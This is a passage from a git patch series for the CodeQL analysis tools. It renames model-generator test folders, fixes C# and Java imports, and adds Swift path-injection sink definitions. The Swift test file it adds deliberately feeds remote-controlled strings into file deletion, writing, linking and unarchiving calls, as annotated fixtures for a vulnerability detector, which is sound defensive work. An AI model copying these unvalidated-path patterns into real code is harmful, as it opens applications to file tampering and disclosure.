a/java/ql/test/utils/model-generator/dataflow/p/FinalClass.java b/java/ql/test/utils/modelgenerator/dataflow/p/FinalClass.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/FinalClass.java rename to java/ql/test/utils/modelgenerator/dataflow/p/FinalClass.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/FluentAPI.java b/java/ql/test/utils/modelgenerator/dataflow/p/FluentAPI.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/FluentAPI.java rename to java/ql/test/utils/modelgenerator/dataflow/p/FluentAPI.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/ImmutablePojo.java b/java/ql/test/utils/modelgenerator/dataflow/p/ImmutablePojo.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/ImmutablePojo.java rename to java/ql/test/utils/modelgenerator/dataflow/p/ImmutablePojo.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/ImplOfExternalSPI.java b/java/ql/test/utils/modelgenerator/dataflow/p/ImplOfExternalSPI.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/ImplOfExternalSPI.java rename to java/ql/test/utils/modelgenerator/dataflow/p/ImplOfExternalSPI.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/InnerClasses.java b/java/ql/test/utils/modelgenerator/dataflow/p/InnerClasses.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/InnerClasses.java rename to java/ql/test/utils/modelgenerator/dataflow/p/InnerClasses.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/InnerHolder.java b/java/ql/test/utils/modelgenerator/dataflow/p/InnerHolder.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/InnerHolder.java rename to java/ql/test/utils/modelgenerator/dataflow/p/InnerHolder.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/Joiner.java b/java/ql/test/utils/modelgenerator/dataflow/p/Joiner.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/Joiner.java rename to java/ql/test/utils/modelgenerator/dataflow/p/Joiner.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/MultipleImpls.java b/java/ql/test/utils/modelgenerator/dataflow/p/MultipleImpls.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/MultipleImpls.java rename to java/ql/test/utils/modelgenerator/dataflow/p/MultipleImpls.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/ParamFlow.java b/java/ql/test/utils/modelgenerator/dataflow/p/ParamFlow.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/ParamFlow.java rename to java/ql/test/utils/modelgenerator/dataflow/p/ParamFlow.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/Pojo.java b/java/ql/test/utils/modelgenerator/dataflow/p/Pojo.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/Pojo.java rename to java/ql/test/utils/modelgenerator/dataflow/p/Pojo.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/PrivateFlowViaPublicInterface.java b/java/ql/test/utils/modelgenerator/dataflow/p/PrivateFlowViaPublicInterface.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/PrivateFlowViaPublicInterface.java rename to java/ql/test/utils/modelgenerator/dataflow/p/PrivateFlowViaPublicInterface.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/Sinks.java b/java/ql/test/utils/modelgenerator/dataflow/p/Sinks.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/Sinks.java rename to java/ql/test/utils/modelgenerator/dataflow/p/Sinks.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/SomeEnum.java b/java/ql/test/utils/modelgenerator/dataflow/p/SomeEnum.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/SomeEnum.java rename to java/ql/test/utils/modelgenerator/dataflow/p/SomeEnum.java diff --git a/java/ql/test/utils/model-generator/dataflow/p/Sources.java b/java/ql/test/utils/modelgenerator/dataflow/p/Sources.java similarity index 100% rename from java/ql/test/utils/model-generator/dataflow/p/Sources.java rename to java/ql/test/utils/modelgenerator/dataflow/p/Sources.java diff --git a/java/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.expected b/java/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.expected similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.expected rename to java/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.expected diff --git a/java/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.ql b/java/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.ql similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/CaptureTypeBasedSummaryModels.ql rename to java/ql/test/utils/modelgenerator/typebasedflow/CaptureTypeBasedSummaryModels.ql diff --git a/java/ql/test/utils/model-generator/typebasedflow/p/MyFunction.java b/java/ql/test/utils/modelgenerator/typebasedflow/p/MyFunction.java similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/p/MyFunction.java rename to java/ql/test/utils/modelgenerator/typebasedflow/p/MyFunction.java diff --git a/java/ql/test/utils/model-generator/typebasedflow/p/Stream.java b/java/ql/test/utils/modelgenerator/typebasedflow/p/Stream.java similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/p/Stream.java rename to java/ql/test/utils/modelgenerator/typebasedflow/p/Stream.java diff --git a/java/ql/test/utils/model-generator/typebasedflow/p/TypeBasedCollection.java b/java/ql/test/utils/modelgenerator/typebasedflow/p/TypeBasedCollection.java similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/p/TypeBasedCollection.java rename to java/ql/test/utils/modelgenerator/typebasedflow/p/TypeBasedCollection.java diff --git a/java/ql/test/utils/model-generator/typebasedflow/p/TypeBasedComplex.java b/java/ql/test/utils/modelgenerator/typebasedflow/p/TypeBasedComplex.java similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/p/TypeBasedComplex.java rename to java/ql/test/utils/modelgenerator/typebasedflow/p/TypeBasedComplex.java diff --git a/java/ql/test/utils/model-generator/typebasedflow/p/TypeBasedSimple.java b/java/ql/test/utils/modelgenerator/typebasedflow/p/TypeBasedSimple.java similarity index 100% rename from java/ql/test/utils/model-generator/typebasedflow/p/TypeBasedSimple.java rename to java/ql/test/utils/modelgenerator/typebasedflow/p/TypeBasedSimple.java From 11ca3f49f6058dbe98e878b6410bf27681f7c718 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 20 Dec 2022 14:27:09 +0100 Subject: [PATCH 178/381] C#/Java: Adjust imports after moving files. --- .../src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql | 4 ++-- csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql | 4 ++-- csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql | 2 +- csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql | 2 +- csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql | 4 ++-- .../src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql | 2 +- java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql | 4 ++-- java/ql/src/utils/modelgenerator/CaptureSinkModels.ql | 2 +- java/ql/src/utils/modelgenerator/CaptureSourceModels.ql | 2 +- java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql | 4 ++-- .../src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql | 2 +- 11 files changed, 16 insertions(+), 16 deletions(-) diff --git a/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql index 9e71580b552..f16e75b588e 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql @@ -5,8 +5,8 @@ */ import semmle.code.csharp.dataflow.ExternalFlow -import utils.modelgenerator.internal.CaptureModels -import utils.modelgenerator.internal.CaptureSummaryFlow +import internal.CaptureModels +import internal.CaptureSummaryFlow from DataFlowTargetApi api, string flow where flow = captureFlow(api) and hasSummary(api, false) diff --git a/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql index a7e4be6ff2e..9149a53116c 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql @@ -7,8 +7,8 @@ */ import semmle.code.csharp.dataflow.ExternalFlow -import utils.modelgenerator.internal.CaptureModels -import utils.modelgenerator.internal.CaptureSummaryFlow +import internal.CaptureModels +import internal.CaptureSummaryFlow from DataFlowTargetApi api, string noflow where diff --git a/csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql index c19971b098a..bba5081c223 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureSinkModels.ql @@ -6,7 +6,7 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureModels +import internal.CaptureModels class Activate extends ActiveConfiguration { override predicate activateToSinkConfig() { any() } diff --git a/csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql index 913624e315a..f504a291d7e 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureSourceModels.ql @@ -6,7 +6,7 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureModels +import internal.CaptureModels class Activate extends ActiveConfiguration { override predicate activateFromSourceConfig() { any() } diff --git a/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql index eadb7e005f3..7002ead8fb4 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql @@ -7,8 +7,8 @@ */ import semmle.code.csharp.dataflow.ExternalFlow -import utils.modelgenerator.internal.CaptureModels -import utils.modelgenerator.internal.CaptureSummaryFlow +import internal.CaptureModels +import internal.CaptureSummaryFlow from DataFlowTargetApi api, string flow where flow = captureFlow(api) and not hasSummary(api, false) diff --git a/csharp/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql index d2bb7c39826..19bec058d40 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql @@ -6,7 +6,7 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureTypeBasedSummaryModels +import internal.CaptureTypeBasedSummaryModels from TypeBasedFlowTargetApi api, string flow where flow = captureFlow(api) diff --git a/java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql b/java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql index 32d4ceb3aa9..1f0c9fa5427 100644 --- a/java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql +++ b/java/ql/src/utils/modelgenerator/CaptureNeutralModels.ql @@ -6,8 +6,8 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureModels -import utils.modelgenerator.internal.CaptureSummaryFlow +import internal.CaptureModels +import internal.CaptureSummaryFlow from DataFlowTargetApi api, string noflow where noflow = captureNoFlow(api) diff --git a/java/ql/src/utils/modelgenerator/CaptureSinkModels.ql b/java/ql/src/utils/modelgenerator/CaptureSinkModels.ql index 3d2cd5933ff..8d273ba77f8 100644 --- a/java/ql/src/utils/modelgenerator/CaptureSinkModels.ql +++ b/java/ql/src/utils/modelgenerator/CaptureSinkModels.ql @@ -6,7 +6,7 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureModels +import internal.CaptureModels class Activate extends ActiveConfiguration { override predicate activateToSinkConfig() { any() } diff --git a/java/ql/src/utils/modelgenerator/CaptureSourceModels.ql b/java/ql/src/utils/modelgenerator/CaptureSourceModels.ql index fffc43adc78..f4fc9982797 100644 --- a/java/ql/src/utils/modelgenerator/CaptureSourceModels.ql +++ b/java/ql/src/utils/modelgenerator/CaptureSourceModels.ql @@ -6,7 +6,7 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureModels +import internal.CaptureModels class Activate extends ActiveConfiguration { override predicate activateFromSourceConfig() { any() } diff --git a/java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql b/java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql index 33a21940d39..33d07d5f2c1 100644 --- a/java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql +++ b/java/ql/src/utils/modelgenerator/CaptureSummaryModels.ql @@ -6,8 +6,8 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureModels -import utils.modelgenerator.internal.CaptureSummaryFlow +import internal.CaptureModels +import internal.CaptureSummaryFlow from DataFlowTargetApi api, string flow where flow = captureFlow(api) diff --git a/java/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql b/java/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql index 959b6dc7f78..f0a33731a87 100644 --- a/java/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql +++ b/java/ql/src/utils/modelgenerator/CaptureTypeBasedSummaryModels.ql @@ -6,7 +6,7 @@ * @tags modelgenerator */ -import utils.modelgenerator.internal.CaptureTypeBasedSummaryModels +import internal.CaptureTypeBasedSummaryModels from TypeBasedFlowTargetApi api, string flow where flow = captureFlow(api) From c115a9fee48f21ef877a5c8b1d2340900c5f79a5 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 19 Dec 2022 18:03:21 +0100 Subject: [PATCH 179/381] Add more path injection sinks --- .../codeql/swift/security/PathInjection.qll | 9 + .../Security/CWE-022/testPathInjection.swift | 186 +++++++++++------- 2 files changed, 128 insertions(+), 67 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/PathInjection.qll b/swift/ql/lib/codeql/swift/security/PathInjection.qll index 7b3554cf0ec..58eedc7c71e 100644 --- a/swift/ql/lib/codeql/swift/security/PathInjection.qll +++ b/swift/ql/lib/codeql/swift/security/PathInjection.qll @@ -105,6 +105,15 @@ private class PathInjectionSinks extends SinkModelCsv { ";NIOFileHandle;true;init(descriptor:);;;Argument[0];path-injection", ";NIOFileHandle;true;init(path:mode:flags:);;;Argument[0];path-injection", ";NIOFileHandle;true;init(path:);;;Argument[0];path-injection", + ";NSString;true;write(to:atomically:encoding:);;;Argument[0];path-injection", + ";NSString;true;write(toFile:atomically:encoding:);;;Argument[0];path-injection", + ";NSKeyedUnarchiver;true;unarchiveObject(withFile:);;;Argument[0];path-injection", + ";ArchiveByteStream;true;fileStream(fd:automaticClose:);;;Argument[0];path-injection", + ";ArchiveByteStream;true;withFileStream(fd:automaticClose:_:);;;Argument[0];path-injection", + ";ArchiveByteStream;true;fileStream(path:mode:options:permissions:);;;Argument[0];path-injection", + ";ArchiveByteStream;true;withFileStream(path:mode:options:permissions:_:);;;Argument[0];path-injection", + ";Bundle;true;init(url:);;;Argument[0];path-injection", + ";Bundle;true;init(path:);;;Argument[0];path-injection", // GRDB ";Database;true;init(path:description:configuration:);;;Argument[0];path-injection", ";DatabasePool;true;init(path:configuration:);;;Argument[0];path-injection", diff --git a/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift b/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift index 1d9145a9e97..fbca64d0652 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift +++ b/swift/ql/test/query-tests/Security/CWE-022/testPathInjection.swift @@ -15,6 +15,11 @@ extension String { } } +class NSString { + func write(toFile: String, atomically: Bool, encoding: UInt) {} + func write(to: URL, atomically: Bool, encoding: UInt) {} +} + class Data { struct WritingOptions : OptionSet { let rawValue: Int } init(_ elements: S) {} @@ -29,6 +34,10 @@ class NSData { func write(toFile: String, options: NSData.WritingOptions) {} } +class NSKeyedUnarchiver { + func unarchiveObject(withFile: String) -> Any? { return nil } +} + struct URLResourceKey {} struct FileAttributeKey : Hashable {} @@ -37,9 +46,10 @@ struct ObjCBool {} struct AutoreleasingUnsafeMutablePointer {} -struct FilePath { +struct FilePath : ExpressibleByStringLiteral { + typealias StringLiteralType = String init(stringLiteral: String) {} - func lexicallyNormalized() -> FilePath { return FilePath(stringLiteral: "") } + func lexicallyNormalized() -> FilePath { return "" } func starts(with: FilePath) -> Bool { return false } } @@ -91,6 +101,38 @@ class FileManager { func replaceItemAtURL(originalItemURL: NSURL, withItemAtURL: NSURL, backupItemName: String?, options: FileManager.ItemReplacementOptions) -> NSURL? { return nil } } +struct FileDescriptor { + struct AccessMode : RawRepresentable { + static let readOnly = AccessMode(rawValue: 0) + let rawValue: UInt8 + init(rawValue: UInt8) { self.rawValue = rawValue} + } + + struct OpenOptions : RawRepresentable { + static let append = OpenOptions(rawValue: 0) + let rawValue: UInt8 + init(rawValue: UInt8) { self.rawValue = rawValue} + } +} + +struct FilePermissions : RawRepresentable { + static let ownerRead = FilePermissions(rawValue: 0) + let rawValue: UInt8 + init(rawValue: UInt8) { self.rawValue = rawValue} +} + +class ArchiveByteStream { + static func fileStream(fd: FileDescriptor, automaticClose: Bool = true) -> ArchiveByteStream? { return nil } + static func withFileStream(fd: FileDescriptor, automaticClose: Bool = true, _ body: (ArchiveByteStream) -> E) -> E { return body(ArchiveByteStream()) } + static func fileStream(path: FilePath, mode: FileDescriptor.AccessMode, options: FileDescriptor.OpenOptions, permissions: FilePermissions) -> ArchiveByteStream? { return nil } + static func withFileStream(path: FilePath, mode: FileDescriptor.AccessMode, options: FileDescriptor.OpenOptions, permissions: FilePermissions, _ body: (ArchiveByteStream) -> E) -> E { return body(ArchiveByteStream()) } +} + +class Bundle { + init?(url: URL) {} + init?(path: String) {} +} + // GRDB struct Configuration {} @@ -124,81 +166,91 @@ func test() { let safeUrl = URL(string: "")! let safeNsUrl = NSURL(string: "")! - Data("").write(to: remoteUrl, options: []) // $ hasPathInjection=121 + Data("").write(to: remoteUrl, options: []) // $ hasPathInjection=163 let nsData = NSData() - let _ = nsData.write(to: remoteUrl, atomically: false) // $ hasPathInjection=121 - nsData.write(to: remoteUrl, options: []) // $ hasPathInjection=121 - let _ = nsData.write(toFile: remoteString, atomically: false) // $ hasPathInjection=121 - nsData.write(toFile: remoteString, options: []) // $ hasPathInjection=121 + let _ = nsData.write(to: remoteUrl, atomically: false) // $ hasPathInjection=163 + nsData.write(to: remoteUrl, options: []) // $ hasPathInjection=163 + let _ = nsData.write(toFile: remoteString, atomically: false) // $ hasPathInjection=163 + nsData.write(toFile: remoteString, options: []) // $ hasPathInjection=163 let fm = FileManager() - let _ = fm.contentsOfDirectory(at: remoteUrl, includingPropertiesForKeys: [], options: []) // $ hasPathInjection=121 - let _ = fm.contentsOfDirectory(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.enumerator(at: remoteUrl, includingPropertiesForKeys: [], options: [], errorHandler: nil) // $ hasPathInjection=121 - let _ = fm.enumerator(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.subpathsOfDirectory(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.subpaths(atPath: remoteString) // $ hasPathInjection=121 - fm.createDirectory(at: remoteUrl, withIntermediateDirectories: false, attributes: [:]) // $ hasPathInjection=121 - let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=121 - let _ = fm.createFile(atPath: remoteString, contents: nil, attributes: [:]) // $ hasPathInjection=121 - fm.removeItem(at: remoteUrl) // $ hasPathInjection=121 - fm.removeItem(atPath: remoteString) // $ hasPathInjection=121 - fm.trashItem(at: remoteUrl, resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=121 - let _ = fm.replaceItemAt(remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 - let _ = fm.replaceItemAt(safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 - fm.replaceItem(at: remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=121 - fm.replaceItem(at: safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=121 - fm.copyItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=121 - fm.copyItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=121 - fm.copyItem(atPath: remoteString, toPath: "") // $ hasPathInjection=121 - fm.copyItem(atPath: "", toPath: remoteString) // $ hasPathInjection=121 - fm.moveItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=121 - fm.moveItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=121 - fm.moveItem(atPath: remoteString, toPath: "") // $ hasPathInjection=121 - fm.moveItem(atPath: "", toPath: remoteString) // $ hasPathInjection=121 - fm.createSymbolicLink(at: remoteUrl, withDestinationURL: safeUrl) // $ hasPathInjection=121 - fm.createSymbolicLink(at: safeUrl, withDestinationURL: remoteUrl) // $ hasPathInjection=121 - fm.createSymbolicLink(atPath: remoteString, withDestinationPath: "") // $ hasPathInjection=121 - fm.createSymbolicLink(atPath: "", withDestinationPath: remoteString) // $ hasPathInjection=121 - fm.linkItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=121 - fm.linkItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=121 - fm.linkItem(atPath: remoteString, toPath: "") // $ hasPathInjection=121 - fm.linkItem(atPath: "", toPath: remoteString) // $ hasPathInjection=121 - let _ = fm.destinationOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.fileExists(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.fileExists(atPath: remoteString, isDirectory: UnsafeMutablePointer.init(bitPattern: 0)) // $ hasPathInjection=121 - fm.setAttributes([:], ofItemAtPath: remoteString) // $ hasPathInjection=121 - let _ = fm.contents(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.contentsEqual(atPath: remoteString, andPath: "") // $ hasPathInjection=121 - let _ = fm.contentsEqual(atPath: "", andPath: remoteString) // $ hasPathInjection=121 - let _ = fm.changeCurrentDirectoryPath(remoteString) // $ hasPathInjection=121 - let _ = fm.unmountVolume(at: remoteUrl, options: [], completionHandler: { _ in }) // $ hasPathInjection=121 + let _ = fm.contentsOfDirectory(at: remoteUrl, includingPropertiesForKeys: [], options: []) // $ hasPathInjection=163 + let _ = fm.contentsOfDirectory(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.enumerator(at: remoteUrl, includingPropertiesForKeys: [], options: [], errorHandler: nil) // $ hasPathInjection=163 + let _ = fm.enumerator(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.subpathsOfDirectory(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.subpaths(atPath: remoteString) // $ hasPathInjection=163 + fm.createDirectory(at: remoteUrl, withIntermediateDirectories: false, attributes: [:]) // $ hasPathInjection=163 + let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=163 + let _ = fm.createFile(atPath: remoteString, contents: nil, attributes: [:]) // $ hasPathInjection=163 + fm.removeItem(at: remoteUrl) // $ hasPathInjection=163 + fm.removeItem(atPath: remoteString) // $ hasPathInjection=163 + fm.trashItem(at: remoteUrl, resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=163 + let _ = fm.replaceItemAt(remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: []) // $ hasPathInjection=163 + let _ = fm.replaceItemAt(safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: []) // $ hasPathInjection=163 + fm.replaceItem(at: remoteUrl, withItemAt: safeUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=163 + fm.replaceItem(at: safeUrl, withItemAt: remoteUrl, backupItemName: nil, options: [], resultingItemURL: AutoreleasingUnsafeMutablePointer()) // $ hasPathInjection=163 + fm.copyItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=163 + fm.copyItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=163 + fm.copyItem(atPath: remoteString, toPath: "") // $ hasPathInjection=163 + fm.copyItem(atPath: "", toPath: remoteString) // $ hasPathInjection=163 + fm.moveItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=163 + fm.moveItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=163 + fm.moveItem(atPath: remoteString, toPath: "") // $ hasPathInjection=163 + fm.moveItem(atPath: "", toPath: remoteString) // $ hasPathInjection=163 + fm.createSymbolicLink(at: remoteUrl, withDestinationURL: safeUrl) // $ hasPathInjection=163 + fm.createSymbolicLink(at: safeUrl, withDestinationURL: remoteUrl) // $ hasPathInjection=163 + fm.createSymbolicLink(atPath: remoteString, withDestinationPath: "") // $ hasPathInjection=163 + fm.createSymbolicLink(atPath: "", withDestinationPath: remoteString) // $ hasPathInjection=163 + fm.linkItem(at: remoteUrl, to: safeUrl) // $ hasPathInjection=163 + fm.linkItem(at: safeUrl, to: remoteUrl) // $ hasPathInjection=163 + fm.linkItem(atPath: remoteString, toPath: "") // $ hasPathInjection=163 + fm.linkItem(atPath: "", toPath: remoteString) // $ hasPathInjection=163 + let _ = fm.destinationOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.fileExists(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.fileExists(atPath: remoteString, isDirectory: UnsafeMutablePointer.init(bitPattern: 0)) // $ hasPathInjection=163 + fm.setAttributes([:], ofItemAtPath: remoteString) // $ hasPathInjection=163 + let _ = fm.contents(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.contentsEqual(atPath: remoteString, andPath: "") // $ hasPathInjection=163 + let _ = fm.contentsEqual(atPath: "", andPath: remoteString) // $ hasPathInjection=163 + let _ = fm.changeCurrentDirectoryPath(remoteString) // $ hasPathInjection=163 + let _ = fm.unmountVolume(at: remoteUrl, options: [], completionHandler: { _ in }) // $ hasPathInjection=163 // Deprecated methods - let _ = fm.changeFileAttributes([:], atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.directoryContents(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=121 - let _ = fm.createSymbolicLink(atPath: remoteString, pathContent: "") // $ hasPathInjection=121 - let _ = fm.createSymbolicLink(atPath: "", pathContent: remoteString) // $ hasPathInjection=121 - let _ = fm.pathContentOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=121 - let _ = fm.replaceItemAtURL(originalItemURL: remoteNsUrl, withItemAtURL: safeNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 - let _ = fm.replaceItemAtURL(originalItemURL: safeNsUrl, withItemAtURL: remoteNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=121 + let _ = fm.changeFileAttributes([:], atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.directoryContents(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.createDirectory(atPath: remoteString, attributes: [:]) // $ hasPathInjection=163 + let _ = fm.createSymbolicLink(atPath: remoteString, pathContent: "") // $ hasPathInjection=163 + let _ = fm.createSymbolicLink(atPath: "", pathContent: remoteString) // $ hasPathInjection=163 + let _ = fm.pathContentOfSymbolicLink(atPath: remoteString) // $ hasPathInjection=163 + let _ = fm.replaceItemAtURL(originalItemURL: remoteNsUrl, withItemAtURL: safeNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=163 + let _ = fm.replaceItemAtURL(originalItemURL: safeNsUrl, withItemAtURL: remoteNsUrl, backupItemName: nil, options: []) // $ hasPathInjection=163 - let _ = Database(path: remoteString, description: "", configuration: Configuration()) // $ hasPathInjection=121 + NSString().write(to: remoteUrl, atomically: true, encoding: 0) // $ hasPathInjection=163 + NSString().write(toFile: remoteString, atomically: true, encoding: 0) // $ hasPathInjection=163 + let _ = NSKeyedUnarchiver().unarchiveObject(withFile: remoteString) // $ hasPathInjection=163 + let _ = ArchiveByteStream.fileStream(fd: remoteString as! FileDescriptor, automaticClose: true) // $ hasPathInjection=163 + ArchiveByteStream.withFileStream(fd: remoteString as! FileDescriptor, automaticClose: true) { _ in } // $ hasPathInjection=163 + let _ = ArchiveByteStream.fileStream(path: FilePath(stringLiteral: remoteString), mode: .readOnly, options: .append, permissions: .ownerRead) // $ hasPathInjection=163 + ArchiveByteStream.withFileStream(path: FilePath(stringLiteral: remoteString), mode: .readOnly, options: .append, permissions: .ownerRead) { _ in } // $ hasPathInjection=163 + let _ = Bundle(url: remoteUrl) // $ hasPathInjection=163 + let _ = Bundle(path: remoteString) // $ hasPathInjection=163 + + let _ = Database(path: remoteString, description: "", configuration: Configuration()) // $ hasPathInjection=163 let _ = Database(path: "", description: "", configuration: Configuration()) // Safe - let _ = DatabasePool(path: remoteString, configuration: Configuration()) // $ hasPathInjection=121 + let _ = DatabasePool(path: remoteString, configuration: Configuration()) // $ hasPathInjection=163 let _ = DatabasePool(path: "", configuration: Configuration()) // Safe - let _ = DatabaseQueue(path: remoteString, configuration: Configuration()) // $ hasPathInjection=121 + let _ = DatabaseQueue(path: remoteString, configuration: Configuration()) // $ hasPathInjection=163 let _ = DatabaseQueue(path: "", configuration: Configuration()) // Safe - let _ = DatabaseSnapshotPool(path: remoteString, configuration: Configuration()) // $ hasPathInjection=121 + let _ = DatabaseSnapshotPool(path: remoteString, configuration: 